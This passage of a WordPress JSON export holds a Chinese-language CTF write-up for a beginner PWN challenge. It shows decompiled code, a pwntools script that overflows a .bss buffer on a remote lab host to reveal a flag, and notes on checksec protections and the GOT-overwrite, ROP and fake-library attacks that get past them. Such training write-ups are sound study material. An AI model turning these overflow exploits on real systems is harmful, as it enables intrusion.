src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218173840934\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-c\">#sub_400686()\n__int64 sub_400686()\n{\n  system(&quot;cat flag.txt&quot;);\n  return 0LL;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\u5f53<strong>dword_60106C<\/strong>\u8fd9\u4e2a\u53d8\u91cf\u7684\u503c\u4e3a<strong>1853186401<\/strong>\u65f6\uff0c\u7a0b\u5e8f\u4f1a\u83b7\u53d6flag\u3002<\/p>\n<p>\u53ef\u4ee5\u77e5\u9053<strong>dword60106C<\/strong>\u548c<strong>unk601068<\/strong>\u8fd9\u4fe9\u53d8\u91cf\u90fd\u5728.bss\u6bb5\uff0c\u5e76\u4e14<strong>dword60106C<\/strong>\u5c31\u5728\u79bb<strong>unk601068<\/strong>\u56db\u4e2a\u4f4d\u7f6e\u7684\u5730\u65b9\uff0c\u800c<strong>unk601068<\/strong>\u662f\u7531\u6211\u4eec\u8f93\u5165\u7684\uff0c\u800c\u8f93\u5165\u70b9\u7ed9\u4e8610\u4e2a\u957f\u5ea6\uff0c\u6b63\u597d\u53ef\u4ee5\u8986\u76d6\u6389<strong>dword60106C<\/strong>\u4f7f\u5b83\u53d8\u6210<strong>1853186401<\/strong><\/p>\n<p>\u7f16\u5199exp<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *\np = remote(&#039;111.200.241.244&#039;,64131)\npayload = &#039;a&#039;*4 + p64(1853186401).decode(&#039;unicode_escape&#039;)\np.recvuntil(&quot;bof&quot;)\np.sendline(payload)\np.interactive()<\/code><\/pre>\n<p>\u987a\u5229\u5f97\u5230flag\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py\n[+] Opening connection to 111.200.241.244 on port 64131: Done\n\/home\/kali\/Desktop\/exp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.recvuntil(&quot;bof&quot;)\n\/home\/kali\/Desktop\/exp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.sendline(payload)\n[*] Switching to interactive mode\ncyberpeace{27b2ba0d58bf0f61749f897d8022823a}\n[*] Got EOF while reading in interactive\n$  <\/code><\/pre>\n<h2>\u8865\u5145\uff1a<\/h2>\n<p>\u6765\u81ea<a href=\"https:\/\/blog.csdn.net\/qq_43430261\">GitCloud<\/a>\u5e08\u5085\u6587\u7ae0<a href=\"https:\/\/blog.csdn.net\/qq_43430261\/article\/details\/105516051?spm=1001.2101.3001.6650.2&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ELandingCtr%7EHighlightScore-2.queryctrv2&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ELandingCtr%7EHighlightScore-2.queryctrv2\">PWN-\u6700\u65b0checksec\u7684\u5b89\u88c5\u548c\u4f7f\u7528<\/a><\/p>\n<h3>Rech<\/h3>\n<p>\u7a0b\u5e8f\u67b6\u6784\u4fe1\u606f\uff0c\u5224\u65ad\u662f64\u4f4d\u8fd8\u662f32\u4f4d\uff0cexp\u7f16\u5199\u7684\u65f6\u5019\u662fp64\u8fd8\u662fp32\u3002<\/p>\n<h3>RELRO<\/h3>\n<p><code>Relocation Read-Onl\uff08RELRO\uff09<\/code>\u6b64\u9879\u6280\u672f\u4e3b\u8981\u9488\u5bf9GOT\u6539\u5199\u7684\u653b\u51fb\u65b9\u5f0f\uff0c\u5b83\u5206\u6210\u4e24\u79cd\uff0c<code>Partial RELRO<\/code>\u548c<code>FULL RELRO<\/code><br \/>\n<code>Partial <\/code>\uff08\u90e8\u5206\uff09<code>RELRO<\/code>\u5bb9\u6613\u53d7\u5230\u653b\u51fb\uff0c\u4f8b\u5982\u653b\u51fb\u8005\u53ef\u4ee5<code>atoi.got<\/code>\u4e3a<code>system.plt<\/code>\u8fdb\u800c\u8f93\u5165<code>\/bin\/sh<\/code>\u83b7\u5f97shell\uff0c\u5b8c\u5168RELRO\u4f7f\u6574\u4e2aGOT\u53ea\u8bfb\uff0c\u4ece\u800c\u65e0\u6cd5\u88ab\u8986\u76d6\uff0c\u4f46\u8fd9\u6837\u4f1a\u5927\u5927\u589e\u52a0\u7a0b\u5e8f\u7684\u542f\u52a8\u65f6\u95f4\uff0c\u56e0\u4e3a\u7a0b\u5e8f\u5728\u542f\u52a8\u4e4b\u524d\u9700\u8981\u89e3\u6790\u6240\u6709\u7684\u7b26\u53f7\u3002<\/p>\n<h3>Stack<\/h3>\n<p><strong>Stack<\/strong>: \u6808\u6ea2\u51fa\u68c0\u67e5\uff0c\u7528<strong>Canary\u91d1\u4e1d\u96c0\u503c<\/strong>\u662f\u5426\u53d8\u5316\u6765\u68c0\u6d4b,Canary found\u8868\u793a\u5f00\u542f\u3002<\/p>\n<p>\u91d1\u4e1d\u96c0\u6700\u65e9\u6307\u7684\u662f\u77ff\u5de5\u66fe\u5229\u7528\u91d1\u4e1d\u96c0\u6765\u786e\u8ba4\u662f\u5426\u6709\u6c14\u4f53\u6cc4\u6f0f\uff0c\u5982\u679c\u91d1\u4e1d\u96c0\u56e0\u4e3a\u6c14\u4f53\u6cc4\u6f0f\u800c\u4e2d\u6bd2\u6b7b\u4ea1\uff0c\u53ef\u4ee5\u7ed9\u77ff\u5de5\u9884\u8b66\u3002\u8fd9\u91cc\u662f\u4e00\u79cd\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\u7f13\u89e3\u624b\u6bb5\uff1a\u542f\u7528\u6808\u4fdd\u62a4\u540e\uff0c\u51fd\u6570\u5f00\u59cb\u6267\u884c\u7684\u65f6\u5019\u4f1a\u5148\u5f80\u6808\u91cc\u63d2\u5165cookie\u4fe1\u606f\uff0c\u5f53\u51fd\u6570\u771f\u6b63\u8fd4\u56de\u7684\u65f6\u5019\u4f1a\u9a8c\u8bc1cookie\u4fe1\u606f\u662f\u5426\u5408\u6cd5\uff0c\u5982\u679c\u4e0d\u5408\u6cd5\u5c31\u505c\u6b62\u7a0b\u5e8f\u8fd0\u884c\u3002\u653b\u51fb\u8005\u5728\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u65f6\u5019\u5f80\u5f80\u4e5f\u4f1a\u5c06cookie\u4fe1\u606f\u7ed9\u8986\u76d6\u6389\uff0c\u5bfc\u81f4\u6808\u4fdd\u62a4\u68c0\u67e5\u5931\u8d25\u800c\u963b\u6b62shellcode\u7684\u6267\u884c\u3002\u5728Linux\u5c06cookie\u4fe1\u606f\u79f0\u4e3aCanary\u3002<\/p>\n<h3>NX<\/h3>\n<p>NX enabled\u5982\u679c\u8fd9\u4e2a\u4fdd\u62a4\u5f00\u542f\u5c31\u662f\u610f\u5473\u7740\u6808\u4e2d\u6570\u636e\u6ca1\u6709\u6267\u884c\u6743\u9650\uff0c\u5982\u6b64\u4e00\u6765\uff0c\u5f53\u653b\u51fb\u8005\u5728\u5806\u6808\u4e0a\u90e8\u7f72\u81ea\u5df1\u7684shellcode\u5e76\u89e6\u53d1\u65f6\uff0c\u667a\u6167\u76f4\u63a5\u9020\u6210\u7a0b\u5e8f\u7684\u5d29\u6e83\uff0c\u4f46\u662f\u53ef\u4ee5\u5229\u7528rop\u8fd9\u79cd\u65b9\u6cd5\u7ed5\u8fc7<\/p>\n<h3>PIE<\/h3>\n<p>PTE\uff08Position-Independent Executable\uff0c\u4f4d\u7f6e\u65e0\u5173\u53ef\u6267\u884c\u6587\u4ef6\uff09\u6280\u672f\u4e0eASLR\u6280\u672f\u7c7b\u4f3c\uff0cASLR\u5c06\u7a0b\u5e8f\u8fd0\u884c\u65f6\u7684\u5806\u6808\u4ee5\u53ca\u5171\u4eab\u5e93\u7684\u52a0\u8f7d\u5730\u5740\u968f\u673a\u5316\uff0c\u800cPIE\u53ca\u65f6\u5219\u5728\u7f16\u8bd1\u65f6\u5c06\u7a0b\u5e8f\u7f16\u8bd1\u4e3a\u4f4d\u7f6e\u65e0\u5173\uff0c\u5373\u7a0b\u5e8f\u8fd0\u884c\u65f6\u5404\u4e2a\u6bb5\uff08\u5982\u4ee3\u7801\u4f46\u7b49\uff09\u52a0\u8f7d\u7684\u865a\u62df\u5730\u5740\u4e5f\u662f\u5728\u88c5\u8f7d\u65f6\u624d\u786e\u5b9a\uff0c\u8fd9\u5c31\u610f\u5473\u7740\u3002\u5728PIE\u548cASLR\u540c\u65f6\u5f00\u542f\u7684\u60c5\u51b5\u4e0b\uff0c\u653b\u51fb\u8005\u5c06\u5bf9\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u4e00\u65e0\u6240\u77e5\uff0c\u4f20\u7edf\u6539\u5199GOT\u8868\u9879\u4e5f\u96be\u4ee5\u8fdb\u884c\uff0c\u56e0\u4e3a\u653b\u51fb\u8005\u4e0d\u80fd\u83b7\u5f97\u7a0b\u5e8f\u7684.got\u6bb5\u7684\u865a\u5730\u5740\u3002\u82e5\u5f00\u59cb\u4e00\u822c\u9700\u5728\u653b\u51fb\u65f6\u6b47\u591f\u5730\u5740\u4fe1\u606f\u3002<\/p>\n<h3>RPATH\/RUNPATH<\/h3>\n<p>\u7a0b\u5e8f\u8fd0\u884c\u662f\u7684\u73af\u5883\u53d8\u91cf\uff0c\u8fd0\u884c\u65f6\u6240\u9700\u8981\u7684\u5171\u4eab\u5e93\u6587\u4ef6\u4f18\u5148\u4ece\u8be5\u76ee\u5f55\u5bfb\u627e\uff0c\u53ef\u4ee5fake lib\u9020\u6210\u653b\u51fb\uff0c\u5b9e\u4f8b\uff1a<a href=\"https:\/\/www.jianshu.com\/go-wild?ac=2&amp;url=https:\/\/www.contextis.com\/en\/blog\/linux-privilege-escalation-via-dynamically-linked-shared-object-library\">\u653b\u51fb\u6848\u4f8b<\/a><\/p>\n<h3>FORTIFY<\/h3>\n<p>\u8fd9\u662f\u4e00\u4e2a\u7531GCC\u5b9e\u73b0\u7684\u6e90\u7801\u7ea7\u522b\u7684\u4fdd\u62a4\u673a\u5236\uff0c\u5176\u529f\u80fd\u662f\u5728\u7f16\u8bd1\u7684\u65f6\u5019\u68c0\u67e5\u6e90\u7801\u4ee5\u907f\u514d\u6f5c\u5728\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u7b49\u9519\u8bef<br \/>\n\u7b80\u5355\u5730\u8bf4\uff0c\u52a0\u4e86\u548c\u8fd9\u4e2a\u4fdd\u62a4\u4e4b\u540e\uff0c\u4e00\u4e9b\u654f\u611f\u51fd\u6570\u5982read,fgets,memcpy,printf\u7b49\u7b49\u53ef\u80fd\u5bfc\u81f4\u6f0f\u6d1e\u51fa\u73b0\u7684\u51fd\u6570\u4f1a\u66ff\u6362\u6210__read_chk,__fgets_chk\u7b49\u3002<br \/>\n\u8fd9\u4e9b\u5e26\u4e86chk\u7684\u51fd\u6570 \u4f1a\u68c0\u67e5\u8bfb\u53d6\/\u590d\u5236\u7684\u5b57\u8282\u957f\u5ea6\u662f\u5426\u8d85\u8fc7\u7f13\u51b2\u533a\u957f\u5ea6\uff0c\u901a\u8fc7\u68c0\u67e5\u8bf8\u5982%n\u4e4b\u7c7b\u7684\u5b57\u7b26\u4e32\u536b\u89c6\u662f\u5426\u4f4d\u4e8e\u53ef\u80fd\u88ab\u7528\u6237\u4fee\u6539\u7684\u53ef\u5199\u5730\u5740\uff0c\u907f\u514d\u4e86\u683c\u5f0f\u80e1\u5b57\u7b26\u4e32\u8df3\u8fc7\u67d0\u4e9b\u51fd\u6570\u5982\u76f4\u63a5(%7$x)\u7b49\u65b9\u5f0f\u6765\u907f\u514d\u6f0f\u6d1e\u51fa\u73b0\uff0c\u5f00\u542fFORTIFT\u4fdd\u62a4\u7684\u7a0b\u5e8f\u4f1a\u88abchecksec\u68c0\u51fa\uff0c\u6b64\u5916\uff0c\u5728\u53cd\u7f16\u8bd1\u662f\u76f4\u63a5\u67e5\u770bgot\u8868\u4e5f\u4f1a\u53d1\u73b0chk\u51fd\u6570\u7684\u5b58\u5728\uff0c\u8fd9\u79cd\u68c0\u67e5\u662f\u9ed8\u8ba4\u4e0d\u5f00\u542f\u7684\uff0c\u53ef\u4ee5\u901a\u8fc7\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u653b\u9632\u4e16\u754c\u65b0\u624b\u4e13\u533a\u2014\u2014PWN pwn \u5e38\u9700\u8981\u4f7f\u7528\u5230IDA\uff0c\u5bf9\u4e8e\u5b83\u7684\u5e38\u7528\u547d\u4ee4\u53ef\u4ee5\u53c2\u8003IDA\u57fa\u672c\u4f7f\u7528\u8fd9\u7bc7\u6587\u7ae0\u3002 le [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-343","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=343"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343\/revisions"}],"predecessor-version":[{"id":344,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343\/revisions\/344"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=343"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}